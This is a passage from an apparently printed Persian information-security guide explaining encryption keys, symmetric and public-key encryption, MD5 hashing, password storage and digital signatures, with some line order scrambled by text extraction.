ﻣﻴﺎﻥ ﺍﻋﺪﺍﺩ ۱ﺗﺎ ۱۰۰ﺑﺎﺷﺪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻛﻤـﻲ ﺑﻴـﺸﺘﺮ ﺯﻣـﺎﻥ
ﻻ ﺍﻋﺪﺍﺩ ﺩﻭﺩﻭﻳﻲ ۱۲۸ﺑﻴﺘـﻲ ﻫـﺴﺘﻨﺪ.
ﺑﺒﺮﺩ .ﺍﻣﺮﻭﺯﻩ ﻛﻠﻴﺪﻫﺎ ﻣﻌﻤﻮ ﹰ
ﺍﻳﻦ ﺭﻗﻢ ﺗﻘﺮﻳﺒﹰﺎ ﺑﺮﺍﺑﺮ ﺑﺎ:
۳۴۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰
ﺍﻧﺘﺨﺎﺏ ﻣﺨﺘﻠﻒ ﺍﺳﺖ ﻛﻪ ﺣﺪﺱ ﺯﺩﻥ ﺻـﺤﻴﺢ ﻛﻠﻴـﺪ ﺭﺍ ﺗﻘﺮﻳﺒـﹰﺎ
ﻏﻴﺮ ﻣﻤﻜﻦ ﻣﻲﻛﻨﺪ.
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﻫﻨﮕﺎﻣﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ ﻛـﻪ
ﻓﺮﺳﺘﻨﺪﻩ ﻭ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﻳﻚ ﻛﻠﻴـﺪ ﻣـﺸﺎﺑﻪ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﻨﻨﺪ )ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﻛﻠﻴﺪ ﻣﺸﺨﺺ ﺑﻪ ﺗﻮﺍﻓﻖ ﺭﺳـﻴﺪﻩ
141 Encryption Key
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ
ﺍﻳﻦ ﻧﻮﻉ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺸﺎﺑﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﺍﺳﺖ ،ﺍﻣﺎ ﺑﺎ ﻳـﻚ
ﺗﻔﺎﻭﺕ ﻋﻤﺪﻩ :ﺑﺠﺎﻱ ﻳـﻚ ﻛﻠﻴـﺪ ،ﺩﺭ ﺁﻥ ﺩﻭ ﻛﻠﻴـﺪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ.
ﺩﺭﻭﺍﻗﻊ ﺩﺭ ﺍﻳﻨﺠﺎ ﻛﻠﻴﺪﻱ ﻛـﻪ ﺑـﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﭘﻴـﺎﻡ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﮔﺮﺩﺩ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﻛﻠﻴﺪﻱ ﺍﺳﺖ ﻛـﻪ ﺑـﺮﺍﻱ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﭘﻴـﺎ ﹺﻡ
ﻻ ﻛﻠﻴﺪ ﺍﻭﻝ ﻋﻤﻮﻣﻲ ﺍﺳـﺖ ﻭ
ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ .ﻣﻌﻤﻮ ﹰ
ﻫﻤﻪ ﻣﺠﺎﺯﻧﺪ ﺍﺯ ﺁﻥ ﺍﻃﻼﻉ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﺍﮔﺮ ﺷﻤﺎ ﺑﺨﻮﺍﻫﻴﺪ ﺑﺮﺍﻱ
ﺷﺨﺼﻲ ﻳﻚ ﭘﻴﺎﻡ ﺧﺼﻮﺻﻲ ﺍﺭﺳﺎﻝ ﻛﻨﻴﺪ ﺑﺎﻳﺪ ﺍﺯ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ
ﻭﻱ -ﻛﻪ ﺧﻮﺩ ﺍﻭ ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻫﻤﻪ ﻗﺮﺍﺭ ﺩﺍﺩﻩ
ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ .ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﭘﻴﺎﻡ ،ﻧﻴﺎﺯ ﺑﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲﻭﻱ ﻣﻲﺑﺎﺷﺪ ﻛﻪ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺳﺖ ﻭ ﺍﻳـﻦ ﻛﻠﻴـﺪ ﺭﺍ
ﻧﺒﺎﻳﺪ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﻳﮕﺮﺍﻥ ﻗﺮﺍﺭ ﺩﺍﺩ .ﺑﺎ ﺍﻳﻦ ﺗﻮﺿﻴﺤﺎﺕ
ﻣﺸﺨﺺ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﭘﻴﺎﻡ ﺷﻤﺎ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﻣﻜـﺎﻧﻴﺰﻡ
ﺑﺮﺍﻱ ﻛﺴﻲ ﺍﺭﺳﺎﻝ ﺷﻮﺩ ،ﻫﻴﭻ ﺷـﺨﺺ ﺩﻳﮕـﺮﻱ ﺑﺠـﺰ ﮔﻴﺮﻧـﺪﺓ
ﺣﻘﻴﻘﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺑﺨﻮﺍﻧﺪ.
ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ،ﺷﺨﺺ ﻣﻄﻤﺌﻦ
ﻧﻴﺴﺖ ﭼﻪ ﻛﺴﻲ ﭘﻴﺎﻡ ﺭﺍ ﺑﺮﺍﻱ ﻭﻱ ﺍﺭﺳﺎﻝ ﻛﺮﺩﻩﺍﺳﺖ؛ ﺯﻳـﺮﺍ ﻫـﺮ
ﻛﺴﻲ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ ﻭﻱ ﺭﺍ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ .ﺍﻣـﺎ
ﻓﺮﺳﺘﻨﺪﻩ ﻣﻄﻤﺌﻦ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﺗﻨﻬﺎ ﺻﺎﺣﺐ ﺁﻥ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ
)ﻛﻠﻴﺪﻱ ﻛﻪ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻜﺎﺭ ﺭﻓﺘﻪ( ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ
ﻣﺘﻨﺎﻇﺮ ﺍﻳﻦ ﭘﻴﺎﻡ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ ﻭ ﺑﺨﻮﺍﻧﺪ.
ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﻋﻜﺲ ﺁﻧﭽﻪ ﮔﻔﺘﻪ ﺷﺪ
ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﻧﺪ .ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺷﻤﺎ ﭘﻴﺎﻡ ﺭﺍ ﺑـﺎ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ
ﺧﻮﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﻴﺪ ﻭ ﻫﺮ ﻛﺴﻲ ﻛﻪ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ ﺷـﻤﺎ ﺭﺍ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﻤﺎﻳﺪ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺁﻧﭽـﻪ
ﺑﻪ ﺍﺛﺒﺎﺕ ﻣﻲﺭﺳﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﻄﻤﺌﻨـﹰﺎ ﻓﺮﺳـﺘﻨﺪﺓ ﭘﻴـﺎﻡ ﻛـﺴﻲ
ﻧﻴﺴﺖ ﺟﺰ ﺷﻤﺎ.
ﺑﺨﺶ ﺩﻭﻡ
ﺗﻌﺪﺍﺩ ﺗﻐﻴﻴﺮ ﻣﻜﺎﻥ ﻳﻚ ﺣﺮﻑ ﺭﺍ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ١٤١ﻣـﻲﮔﻮﻳﻨـﺪ.
ﺍﺯ ﺍﻳﻦ ﻋﺪﺩ ﻫﻢ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﭘﻴﺎﻡ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ ﻭ ﻫـﻢ
ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺁﻥ .ﺟﻮﻟﻴﻮﺱ ﺳﺰﺍﺭ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﺭﺳـﺎﻝ
ﭘﻴﺎﻣﻬﺎﻱ ﻣﺤﺮﻣﺎﻧـﻪ ﻭ ﺳـﺮﻱ ﺧـﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤـﻮﺩ )ﺍﻭ ﻛﻠﻴـﺪ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﺑﺮ ﻋﺪﺩ ۳ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻩ ﺑﻮﺩ(.
ﺑﺎﺷﻨﺪ( .ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺩﺭﺻﻮﺭﺗﻲ ﺑﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﭘﻴـﺎﻡ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﺍﺯ ﺟﺎﻳﻲ ﺑﻪ ﺟﺎﻱ ﺩﻳﮕﺮ ﺍﻧﺘﻘﺎﻝ
ﻼ ﺍﻧﺘﻘﺎﻝ ﺍﺯ ﻃﺮﻳـﻖ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺑـﻲﺳـﻴﻢ؛ ﻭ ﻳـﺎ ﺍﻳﻨﻜـﻪ
ﺩﻫﻴﺪ ،ﻣﺜ ﹰ
ﺑﺨﻮﺍﻫﻴــﺪ ﺍﻃﻼﻋــﺎﺕ ﻣﻮﺟــﻮﺩ ﺭﻭﻱ ﻳــﻚ ﺩﻳــﺴﻚ ﺭﺍ ﺑﮕﻮﻧــﻪﺍﻱ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﺩﻳﮕﺮﺍﻥ ﻧﺘﻮﺍﻧﻨﺪ ﺁﻧﺮﺍ ﺑﺨﻮﺍﻧﻨﺪ .ﺩﺭ ﻣﻮﺍﺭﺩ ﺍﺧﻴﺮ
ﺍﮔﺮ ﻛﻠﻴﺪ ﻣﻔﻘﻮﺩ ﺷـﻮﺩ ﺍﻃﻼﻋـﺎﺕ ﺷـﻤﺎ ﻧﻴـﺰ ﻣﻄﻤﺌﻨـﹰﺎ ﺍﺯ ﺩﺳـﺖ
ﺭﻓﺘﻪﺍﻧﺪ.
١٠٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻳﻜﻄﺮﻓﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ
ﺩﺭﻫﻢﺳﺎﺯﻱ
١٤٢
ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﻳﻦ ﺭﻭﺵ ﺭﺍ ﻣﺸﺎﺑﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ ﺑﺪﺍﻧﻴـﺪ
ﺩﺭ ﺣﺎﻟﺘﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﻫﻴﭽﻜﺲ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻧـﺪﺍﺭﺩ .ﺑﻨـﺎﺑﺮﺍﻳﻦ
ﻣﻄﺎﻟﺐ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﻮﻧﺪ ،ﺍﻣﺎ ﻧﻤﻲ ﺗﻮﺍﻧﻨـﺪ ﺭﻣﺰﮔـﺸﺎﻳﻲ
ﮔﺮﺩﻧﺪ؛ ﻭ ﺗﻔﺎﻭﺕ ﺁﻥ ﺑﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ ﺩﺭ ﺍﻳـﻦ ﺍﺳـﺖ
ﻻ ﺣﺪﺍﻛﺜﺮ ﻃﻮﻝ ﻣﺸﺨﺼﻲ ﺩﺍﺭﺩ .ﻳﻜـﻲ ﺍﺯ
ﻛﻪ ﭘﻴﺎﻡ ﺭﻣﺰﺷﺪﻩ ﻣﻌﻤﻮ ﹰ
ﺭﺍﻳﺠﺘــﺮﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬــﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻳﻜﻄﺮﻓــﻪ ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ
ﺩﺭﻫــﻢﺳــﺎﺯﻱ ،ﺍﻟﮕــﻮﺭﻳﺘﻤﻲ ﺑﻨــﺎﻡ ١٤٣MD5ﺍﺳــﺖ .ﺧﺮﻭﺟــﻲ
ﺍﻟﮕﻮﺭﻳﺘﻢ ،MD5ﻫﻤﻴﺸﻪ ۱۲۸ﺑﻴﺖ ) ۱۶ﺑﺎﻳـﺖ( ﻣـﻲﺑﺎﺷـﺪ .ﺍﮔـﺮ
ﻳﻚ ﻛﺪ ﺩﺭﻫﻢﺳﺎﺯﻱﺷﺪﻩ ﺑﺮﺍﻱ ﺩﻭ ﭘﻴـﺎﻡ ﻣﺘﻔـﺎﻭﺕ ﺍﻳﺠـﺎﺩ ﻛﻨﻴـﺪ
ﺍﺣﺘﻤﺎﻝ ﺍﻳﻨﻜﻪ ﺧﺮﻭﺟﻲ ﺩﻭ ﻛﺪ ﺩﺭﻫﻢﺳﺎﺯﻱﺷﺪﻩ ﻣﺸﺎﺑﻪ ﻳﻜـﺪﻳﮕﺮ
ﺑﺎﺷﻨﺪ ﺗﻘﺮﻳﺒﹰﺎ ﺻﻔﺮ ﺧﻮﺍﻫﺪ ﺑﻮﺩ.
ﺍﻳﻦ ﺭﻭﺵ ﻭ ﻛﺪ ﺧﺮﻭﺟﻲ ﺗﻮﻟﻴﺪ ﺷـﺪﻩ ﺩﺭ ﺁﻥ ﺩﻭ ﻛـﺎﺭﺑﺮﺩ ﺍﺻـﻠﻲ
ﺩﺍﺭﻧﺪ:
ﺗﻀﻤﻴﻦ ﺟﺎﻣﻌﻴﺖ
ﻳﻜﺴﺎﻥ ﺑﻮﺩﻥ ﺁﻧﻬﺎ ﻣـﺸﺨﺺ ﻣـﻲﺷـﻮﺩ ﻛـﻪ ﺭﻣـﺰ ﻋﺒـﻮﺭ
ﺻﺤﻴﺢ ﺑﻮﺩﻩ ﺍﺳﺖ .ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﻛﺎﺭﺑﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﺍ ﻓﺮﺍﻣﻮﺵ
ﻲ ﺁﻧﭽـﻪ ﻛـﻪ ﺭﻭﻱ ﺩﻳـﺴﻚ ﺫﺧﻴـﺮﻩ ﺷـﺪﻩ
ﻛﻨﺪ ﺭﻣﺰﮔﺸﺎﻳ ﹺ
ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻧﻴﺴﺖ ﻭ ﺑﺎﻳﺪ ﻳﻚ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺟﺪﻳـﺪ ﺍﻧﺘﺨـﺎﺏ
ﮔﺮﺩﺩ .ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻛﻪ
ﺍﺻﻞ ﺭﻣﺰ ﻋﺒﻮﺭ ﻫﻴﭽﮕﺎﻩ ﻧﺘﻮﺍﻧﺪ ﺩﺭ ﻗﺎﻟﺐ ﺍﺻﻠﻲ ﺧـﻮﺩ ﺑـﻪ
ﻧﻤﺎﻳﺶ ﺩﺭﺁﻳﺪ.
ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻨﻮﺯ ﻳﻚ ﻣﺸﻜﻞ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑـﻪ ﺩﻟﻴـﻞ ﺁﻥ
ﻛﺎﺭﺑﺮ ﻧﺒﺎﻳﺪ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻛﻮﺗـﺎﻩ ،ﺳـﺎﺩﻩ ﻭ ﻳـﺎ ﻗﺎﺑـﻞ
ﺣﺪﺱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﻭ ﺁﻥ ﺍﻳﻨﻜﻪ ﺍﮔـﺮ ﻛـﺴﻲ ﻓﻬﺮﺳـﺘﻲ ﺍﺯ
ﻼ ﺍﺯ
ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﺭﻣﺰﮔ ـﺬﺍﺭﻱﺷــﺪﻩ ﺑﺪﺳــﺖ ﺁﻭﺭﺩ )ﻣــﺜ ﹰ
ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺑﻪ ﺁﻥ ﻧﻔﻮﺫ ﻛﺮﺩﻩ( ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ ﻛـﻪ
ﻫﻤﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮ ﹺﺭ ﺳﺎﺩﺓ ﻣﻤﻜﻦ ﺭﺍ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻧﻤـﻮﺩﻩ ﻭ
ﺑﺎ ﻧﻤﻮﻧﻪﻫﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﺓ ﻣﻮﺟﻮﺩ ﺩﺭ ﺳﻴـﺴﺘﻢ ﺗﻄﺒﻴـﻖ
ﺩﻫﺪ ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺳﺎﺩﺓ ﺳﻴﺴﺘﻢ ﺭﺍ ﭘﻴـﺪﺍ
ﻛﻨﺪ.
ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ
ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﻳـﻚ ﺳـﻨﺪ ﻃـﻮﻻﻧﻲ ﻳـﺎ ﻳـﻚ ﺑﺮﻧﺎﻣـﻪ ﺭﺍ
ﺑﺮﮔﺰﻳﻨﻴــﺪ ،ﻛــﺪ MD5ﺭﺍ ﺑــﺮﺍﻱ ﺁﻥ ﻣﺤﺎﺳــﺒﻪ ﻭ ﺁﻧــﺮﺍ ﺩﺭ
ﻣﺤﻠﻲ ﺍﻣﻦ ﺫﺧﻴﺮﻩ ﻧﻤﺎﻳﻴﺪ .ﻣﺪﺗﻲ ﺑﻌﺪ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺍﺳـﻨﺎﺩ
ﺧﻮﺩ ﻣﺮﺍﺟﻌﻪ ﻭ ﺩﻭﺑﺎﺭﻩ ﺭﻭﻱ ﺁﻥ ﻫﻤﻴﻦ ﻋﻤﻠﻴﺎﺕ ﺭﺍ ﺍﻋﻤـﺎﻝ
ﻛﻨﻴﺪ .ﻃﺒﻴﻌﺘﹰﺎ ﭼﻨﺎﻧﭽﻪ ﻛﺪ ﺟﺪﻳﺪ ﻣﺘﻤﺎﻳﺰ ﺍﺯ ﻛﺪ ﻗﺒﻠـﻲ ﺑـﻮﺩ
ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﻳﺪ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﻳﺎ ﺳـﻨﺪ ﺗﻐﻴﻴـﺮ ﻛـﺮﺩﻩ ﺍﺳـﺖ.
ﻻ ﻳﻚ ﺗﻐﻴﻴﺮ ﺑﺴﻴﺎﺭ ﺟﺰﺋﻲ ﺩﺭ ﻳﻚ ﻓﺎﻳﻞ ﺑﺰﺭﮒ ﻫـﻢ
ﻣﻌﻤﻮ ﹰ
ﺑﺎﻋﺚ ﺍﻳﺠـﺎﺩ ﺗﻐﻴﻴـﺮﺍﺕ ﺯﻳـﺎﺩﻱ ﺩﺭ ﻛـﺪ MD5ﻣﺮﺑﻮﻃـﻪ
ﻣﻲﺷﻮﺩ.
ﺫﺧﻴﺮﺓ ﺭﻣﺰ ﻋﺒﻮﺭ
ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻛـﺎﺭﺑﺮ ﺍﺯ ﻛﻠﻤـﻪﺍﻱ
ﺑﻌﻨﻮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ،ﺍﻳﻦ ﻛﻠﻤﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ
ﺍﻟﮕــﻮﺭﻳﺘﻢ ) MD5ﻳــﺎ ﻳــﻚ ﺍﻟﮕــﻮﺭﻳﺘﻢ ﻣــﺸﺎﺑﻪ( ﺭﻣﺰﮔــﺬﺍﺭﻱ
ﻣﻲﺷﻮﺩ ﻭ ﻧﺴﺨﺔ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺫﺧﻴﺮﻩ ﻣﻲﮔﺮﺩﺩ .ﺑﺎﺭ ﺑﻌﺪ
ﻛﻪ ﻛﺎﺭﺑﺮ ﺳﻌﻲ ﻣﻲﻛﻨﺪ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﻮﺩ ،ﺁﻧﭽﻪ ﻛﻪ ﻭﺍﺭﺩ
ﻣﻲﻛﻨﺪ ﻣﺠﺪﺩﹰﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣـﻲﺷـﻮﺩ ﻭ ﺑـﺎ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ
ﺩﻳﺴﻚ ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﺑﻮﺩ ﻣﻘﺎﻳﺴﻪ ﻣﻲ ﮔـﺮﺩﺩ؛ ﻭ ﺩﺭﺻـﻮﺭﺕ
142 Hash
143 Message Digest 5
١٤٤
ﺍﮔﺮ ﺷﺨﺼﻲ ﺑﺨﻮﺍﻫﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﭘﻴﺎﻣﻲ ﺧﺼﻮﺻﻲ ﺍﺭﺳﺎﻝ ﻛﻨـﺪ ﻭ
ﺑﺨﻮﺍﻫﺪ ﺷﻤﺎ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛﻪ ﻓﺮﺳﺘﻨﺪﻩ ﺁﻥ ﭘﻴﺎﻡ ﻛـﺴﻲ ﺟـﺰ ﺍﻭ
ﻧﻴﺴﺖ ،ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺗﺮﻛﻴﺐ ﺭﻭﺷﻬﺎﻱ ﭘﻴﺶﮔﻔﺘﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ:
.۱ﭘﻴــﺎﻡ ﺭﺍ ﻣــﻲﻧﻮﻳــﺴﺪ ﻭ ﺍﺯ MD5ﺑــﺮﺍﻱ ﺍﻳﺠــﺎﺩ ﻛــﺪ
ﺩﺭﻫﻢﺳﺎﺯﻱﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ.
.۲ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺧﻮﺩ ،ﻛﺪ ﺩﺭﻫﻢﺳﺎﺯﻱﺷـﺪﻩ ﺭﺍ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﺪ.
.۳ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺷﻤﺎ ﻣـﺘﻦ ﭘﻴـﺎﻡ ﺭﺍ ﺭﻣﺰﮔـﺬﺍﺭﻱ
ﻣﻲﻧﻤﺎﻳﺪ.
.۴ﭘﻴﺎﻡ ﻭ ﻛﺪ ﺩﺭﻫﻢﺳﺎﺯﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ.
.۵ﺷﻤﺎ ﭘﻴﺎﻡ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ.
.۶ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴــﺪ ﻋﻤــﻮﻣﻲ ﻭﻱ ﻛــﺪ ﺩﺭﻫــﻢﺳــﺎﺯﻱ ﺭﺍ
ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻧﻤﺎﻳﻴﺪ ،ﻛﻪ ﻧﺘﻴﺠـﻪ ﺁﻥ ﺑﺪﺳـﺖ ﺁﻣـﺪﻥ ﻛـﺪ
ﺩﺭﻫﻢﺳﺎﺯﻱ ﺍﺻﻠﻲ ﺍﺳﺖ.
144 Digital Signature
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
١٠٩
.۷ﻣﺘﻦ ﭘﻴﺎﻡ ﺍﺭﺳﺎﻟﻲ ﺭﺍ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ ﺧـﻮﺩ
ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻛﻨﻴﺪ.
.۸ﺑــﺮﺍﻱ ﻣــﺘﻦ ﭘﻴــﺎﻡ ﺍﺭﺳــﺎﻟﻲ ،ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ MD5ﻛــﺪ
ﺩﺭﻫﻢﺳﺎﺯﻱ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻣﻲﻧﻤﺎﻳﻴﺪ.
ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ١٤٥ﻛﻪ ﺑﻮﺳـﻴﻠﻪ ﻣﺮﻭﺭﮔﺮﻫـﺎﻱ ﻭﺏ ﺑـﺮﺍﻱ
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﻳﻤﻦ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻧﻴﺰ ﺑﺮ ﺍﺳﺎﺱ
ﻓﻨﻮﻥ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ )ﻣﺸﺎﺑﻪ ﻣﺜﺎﻝ ﻓﻮﻕ( ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ.
145 Digital Certificates
ﺑﺨﺶ ﺩﻭﻡ
